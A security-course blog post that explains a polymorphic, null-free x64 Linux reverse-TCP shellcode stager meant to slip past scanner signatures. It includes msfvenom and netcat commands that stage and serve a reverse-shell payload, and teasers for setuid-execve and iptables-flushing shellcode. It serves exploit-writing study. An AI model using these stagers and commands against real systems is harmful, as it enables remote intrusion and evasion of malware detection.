Skip to main content

PolyRevTcp1434

This blog post has been created for completing the requirements of the SecurityTube Linux Assembly Expert certification.
http://securitytube-training.com/online-courses/securitytube-linux-assembly-expert/

Student ID: SLAE64-1434

Target Operating System: 64 bit Linux (x86_64 GNU/Linux)

Original Shellcode: Metasploits linux/x64/shell/reverse_tcp
Original number of bytes: 68
Original number of nulls: 3


GitHub Link: https://github.com/rtaylor777/nasm/blob/master/PolyRevTcp1434.nasm

My version:
Number of bytes = 65
Number of nulls = 0

PolyRevTcp1434.nasm

Intro

When I studied the Metasploit payload linux/x64/shell/reverse_tcp I could see that there was opportunity to reduce it's size. Furthermore it had nulls in it which quite probably means that it would need to be encoded which would further increase it's size.

So  I thought I would take a stab at reducing it's size and removing the nulls.

Testing

Download:
wget https://raw.githubusercontent.com/rtaylor777/nasm/master/PolyRevTcp1434.nasm

Assuming you have the NASM assembler ( http://www.nasm.us/ ):
Assemble:
nasm -felf64 PolyRevTcp1434.nasm -o PolyRevTcp1434.o

Link:
ld  PolyRevTcp1434.o -o PolyRevTcp1434

Before executing, since this is a staged shellcode we need to set up our listener.

Using metasploit:
  1. In one terminal run msfconsole 
  2. use multi/handler
  3. set PAYLOAD linux/x64/shell/reverse_tcp
  4. set LHOST 127.0.0.1
  5. set LPORT 4444
  6. exploit 
Then in another terminal run:
./PolyRevTcp1434


shellcode.c
If you missed it from my previous blog posts the shellcode.c file is auto generated by my helper scripts. See: http://a41l4.blogspot.ca/2017/02/slae-helper-scripts.html

Test #2
For this test I am illustrating using the shellcode in my shellcode.c file which loads 0xffffffffffffffff into all the main registers to ensure the shellcode does not depend on any existing register state. Also this is an alternate way to perform this staged process without using msfconsole.

Payload:
msfvenom -p linux/x64/shell_reverse_tcp LHOST=127.0.0.1 LPORT=4445 -f raw > payload

Open 2 terminals that we will run netcat in and run the following commands, one in each terminal.
cat payload | nc -l -p 4444 127.0.0.1
nc -l -p 4445 127.0.0.1

Then in a 3rd terminal run our stager.
./shellcode

 

Polymorphic

This version of the shellcode is enough different that it should generate a different signature and not be found in any existing signature database for a malware scanner. With that said I have not obfuscated it that much and it should still be fairly easy to see what it is doing.

High Level

At a high level, the shellcode first uses mmap to request a page of memory (4096 byes) and sets the memory protection such that this page is readable, writable and executable.

Then it opens a socket, makes a connection back to a client and then reads a payload from a client. The payload is saved into the page of memory that was requested near the beginning.

Finally the address of the payload is pushed onto the stack and the ret instruction pops that address into the instruction pointer (RIP) and begins executing whatever code is available at that address.

Please See

If you are new to shellcode or shellcoding you should start by reading my blog post: http://a41l4.blogspot.ca/2017/01/execvestack1434.html

To understand the Socket and Connect sections read my blog posts:
http://a41l4.blogspot.ca/2017/02/assignment-1b.html
and
http://a41l4.blogspot.ca/2017/02/assignment-2b.html

Mmap

The following is my analysis of this section when studying the original shellcode. It should provide enough detail to understand what is happening.

man mmap
void *mmap(void *addr, size_t length, int prot, int flags, int fd, off_t offset);

Registers used for a system call:
RAX - System Call Number
RDI  - First Argument
RSI  - Second Argument
RDX - Third Argument
R10 - Fourth Argument
R8   - Fifth Argument
R9   - Sixth Argument

There are six (6) arguments to the mmap system call so the registers RDI to R9 are used.
Stepping through to the system call lets see what the registers end up being set to.



"If addr is NULL, then the kernel chooses the address at which to create the mapping" man page.

"The contents of a file mapping (as opposed to an anonymous mapping; see MAP_ANONYMOUS below), are initialized using length  bytes starting  at offset offset in the file (or other object) referred to by the file descriptor fd." man page.

Okay so we are mapping 4096 bytes starting at offset 0 in the file referred to by fd (which is 1 for the standard out file descriptor).

I found the flags values in this file: /usr/include/asm-generic/mman-common.h
It appears that RDX is a bitwise combination of PROT_READ, PROT_WRITE, PROT_EXEC.
There is a good chance that the DH value is ignored and so the combination of 1, 2 and 4 adds up to 7 and that is all that is significant in RDX.
The value in R10 appears to be a bitwise combination of MAP_PRIVATE and MAP_ANONYMOUS.

The result of the system call puts an address where the 4096 bytes were allocated into RAX.
rax            0x7ffff7ff4000   140737354088448


Read

This section is pretty straight forward. From my notes:

man read
ssize_t read(int fd, void *buf, size_t count);

RDI is already set, RSI is set to our previously allocated 4096 byte memory address, RDX, is set to the number 4096. The system call number for read is 0 which happens to be what RAX is already set to as a result of the previous system call.

Okay so this is the point where our client (possibly netcat) would load a payload up to a size of 4096 bytes.

Execute

Lines 70 and 71 simply loads a return address, from RSI, which is currently pointing to our payload, onto the stack and then the ret instruction pops that address into the instruction pointer RIP and begins executing whatever code is at that address (our payload).

Summary

The PolyRevTcp1434 shellcode is a polymorphic version of the metasploit payload "linux/x64/shell/reverse_tcp". You can use it in place of the metasploit stager (stub) and it is slightly (3 bytes) smaller with 0 nulls.

If you wish to learn more about assembly language, I highly recommend the "SecurityTube Linux Assembly Expert course and certification."

http://securitytube-training.com/online-courses/securitytube-linux-assembly-expert/

Comments

Post a Comment

Popular posts from this blog

GIAC GXPN Review – SANS SEC660 (Advanced Penetration Testing, Exploit Writing, and Ethical Hacking)   Intro  SANS is a well respected and premier cyber security training company that employs industry experts as instructors. GIAC is a company that produces testing to validate the skills of security professionals. GIAC exams validate the learning outcomes of the SANS courses. Prerequisites Before attempting this course you should be familiar with penetration testing as this is an advanced course. I would say that you should also be familiar with assembly language and shellcoding. It would be best if you have studied basic stack overflow exploits prior to this course. You will need a basic understanding of programming in C or C++ (preferably both). Scripting using Python would be a useful prerequisite. If you could learn a bit of Ruby scripting it would help for the Metasploit module creation. Be familiar with various routing and networking protocols. Course Coverage This course covers ma
Post a Comment
Read more

PolySetuidExecve1434

This blog post has been created for completing the requirements of the SecurityTube Linux Assembly Expert certification." http://securitytube-training.com/online-courses/securitytube-linux-assembly-expert/ Student ID: SLAE64-1434 Target Operating System : 64 bit Linux (x86_64 GNU/Linux) This blog post is part of Assignment 6: http://a41l4.blogspot.ca/2017/03/assignment-6.html The Original Version: http://shell-storm.org/shellcode/files/shellcode-77.php My Version: GitHub Link : https://github.com/rtaylor777/nasm/blob/master/PolySetuidExecve1434.nasm Published : https://www.exploit-db.com/exploits/41498/ Original Shellcode bytes = 49 My version: Number of bytes = 31 Number of nulls = 0 PolySetuidExecve1434.nasm Intro This shellcode when executed will first setuid(0) and then execute /bin/sh and provide you with a shell. The purpose of calling setuid(0) is, suppose that you have managed to inject this shellcode into an executable that is Set-UID root. I
Post a Comment
Read more

PolyFlushIPTables1434

This blog post has been created for completing the requirements of the SecurityTube Linux Assembly Expert certification." http://securitytube-training.com/online-courses/securitytube-linux-assembly-expert/ Student ID: SLAE64-1434 Target Operating System : 64 bit Linux (x86_64 GNU/Linux) This blog post is part of Assignment 6: http://a41l4.blogspot.ca/2017/03/assignment-6.html The Original Version: http://shell-storm.org/shellcode/files/shellcode-683.php Original size: 50 bytes (don't believe what he says :) My Version: GitHub Link : https://github.com/rtaylor777/nasm/blob/master/PolyFlushIPTables1434.nasm Published : https://www.exploit-db.com/exploits/41503/ My version: Number of bytes = 47 Number of nulls = 0 PolyFlushIPTables1434.nasm  Intro This shellcode basically just executes /sbin/iptables -F without any other parameters. man iptables "-F, --flush [chain]               Flush  the  selected  chain (all the chains in the table if none i
Post a Comment
Read more